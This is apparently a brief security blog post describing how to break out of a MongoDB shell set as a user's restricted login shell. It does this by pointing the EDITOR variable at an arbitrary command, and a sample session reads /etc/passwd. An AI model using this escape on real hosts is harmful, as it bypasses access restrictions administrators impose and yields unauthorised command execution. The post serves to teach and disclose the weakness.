Mongo provides a native shell for interacting with local and remote MongoDB instances. In rare cases you may find that a user’s logon shell has been replaced with this Mongo shell, this could happen when there is a shared machine where you want developers/admins to access the database but not have native access to the host. Everytime the user logs in, they hit the mongo shell, can execute mongo db commands and thats it.. right? Not quite.
The Mongo shell allows external editors to be used when editing script files. To define the external editor simply change the environment variable “EDITOR”. This provides us with the opportunity to escape the restricted mongo shell and get local access on the host.
$ mongo MongoDB shell version: 2.6.9 connecting to: test > EDITOR="/bin/cat /etc/passwd" > edit x root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin ..<SNIP>..
A very simple escape and unlikely that you’ll ever run into this. But if you do, well now you can get command execution where you shouldn’t.